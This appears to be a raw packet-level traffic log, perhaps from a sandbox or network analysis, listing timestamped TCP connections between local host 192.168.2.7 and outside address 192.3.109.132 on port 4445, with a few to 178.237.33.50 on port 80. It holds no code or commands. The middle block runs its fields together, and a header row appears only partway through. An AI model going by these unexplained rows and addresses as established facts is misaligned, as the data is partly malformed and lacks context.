Mar 28, 2024 13:59:16.455279112 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455292940 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455317020 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455331087 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.455363989 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455380917 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455427885 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455429077 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.455472946 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455485106 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.455487967 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455504894 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455521107 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455529928 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.455545902 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455549955 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.455580950 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455596924 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455610991 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455647945 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455650091 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.455650091 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.455673933 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455718994 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455749035 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455749035 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.455763102 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455862999 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.455862999 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.615231037 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.615258932 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.615305901 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.615324974 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.615339041 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.615345001 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.615370035 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.615401030 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.615410089 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.615410089 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.615438938 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.615483999 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.615505934 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.615520954 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.615577936 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.615623951 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.615696907 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.615747929 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.615797043 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.615828991 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.615874052 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.615894079 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.615917921 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.615968943 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.615977049 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616015911 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616053104 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616091013 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616095066 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.616105080 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616154909 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616161108 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.616168976 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616182089 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616193056 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616239071 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.616240025 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.616241932 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616292953 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616317034 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616329908 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616341114 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.616396904 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616399050 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.616440058 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616473913 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616476059 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.616571903 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.616620064 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616714001 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616765976 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.616784096 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616853952 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616914988 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.616961956 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.616964102 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617012024 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617050886 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.617053032 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617073059 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617085934 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617099047 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617121935 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617125988 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.617145061 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.617165089 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617177010 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.617177963 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617191076 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617213964 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617233992 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.617254972 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617274046 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617280006 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.617314100 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617341995 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.617429972 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617486000 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617505074 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617506981 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.617552042 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617599964 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617636919 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617638111 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.617681026 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617705107 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.617724895 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617749929 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.617785931 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617798090 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617810965 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617837906 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617851973 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617855072 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.617855072 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.617885113 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617897987 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.617902994 CET  49711  4445  192.168.2.7  192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.617911100 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.617938995 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.617959023 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618032932 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618046045 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618052006 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618058920 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618071079 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618099928 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618112087 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618113041 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618113995 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618124962 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618149996 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618160963 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618216038 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618251085 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618266106 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618294954 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618345022 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618418932 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.618458033 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.624198914 CET8049712178.237.33.50192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.624300003 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 13:59:16.654270887 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.775736094 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.775783062 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.775897980 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.775979996 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.776062012 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.776118040 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.776304960 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.776432037 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.776496887 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.776529074 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.776659966 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.776720047 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.776802063 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.776957989 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.777048111 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.777122974 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.777148962 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.777239084 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.777271986 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.777827978 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.777879953 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.778585911 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.778681040 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.778731108 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.778846025 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.778934002 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.778991938 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.779031992 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.779113054 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.779165030 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.779186964 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.779283047 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.779504061 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.779534101 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.779577017 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.779645920 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.779676914 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.779772043 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.779953957 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.779999971 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.780035973 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.780101061 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.780256987 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.780358076 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.780424118 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.780436993 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.780509949 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.780567884 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.780600071 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.780697107 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.780750990 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.780771971 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.780931950 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.781073093 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.781481981 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.781583071 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.781651020 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.781728983 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.781842947 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.781934023 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.781940937 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.782422066 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.782488108 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.782500982 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.782579899 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.782634974 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.782697916 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.782820940 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.782871962 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.783009052 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.783227921 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.783286095 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.783291101 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.783423901 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.783521891 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.783525944 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.783620119 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.783680916 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.783744097 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.784030914 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.784087896 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.784147024 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.784249067 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.784296036 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.784301043 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.784651041 CET444549711192.3.109.132192.168.2.7
Timestamp                              Source Port  Dest Port  Source IP      Dest IP
Mar 28, 2024 13:59:16.784719944 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.784758091 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.784949064 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.785031080 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.785044909 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.785120964 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.785173893 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.785206079 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.785510063 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.785573006 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.785608053 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.785710096 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.785804033 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.786294937 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.786458969 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.786529064 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.786751986 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.787159920 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.787283897 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.787300110 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.787493944 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.787558079 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.787617922 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.787727118 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.787777901 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.787857056 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.787935972 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.788048983 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.788104057 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.788121939 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.788156986 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.788192987 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.788290024 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.788343906 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.788346052 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.788397074 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.788451910 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.788455963 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.788528919 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.788577080 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.788593054 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.788655996 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.788686037 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.788701057 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.788764000 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.788829088 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.788873911 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.788935900 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.788995028 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.789009094 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.789083958 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.789119959 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.789156914 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.789215088 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.789268017 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.789366007 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.789479017 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.789499998 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.789534092 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.789570093 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.789617062 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.789653063 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.789729118 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.789762020 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.789827108 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.789841890 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.789880991 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.789891958 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.789947033 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.789988041 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.790007114 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.790133953 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.790169954 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.790288925 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.790328026 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.790389061 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.790400982 CET    49711        4445       192.168.2.7    192.3.109.132
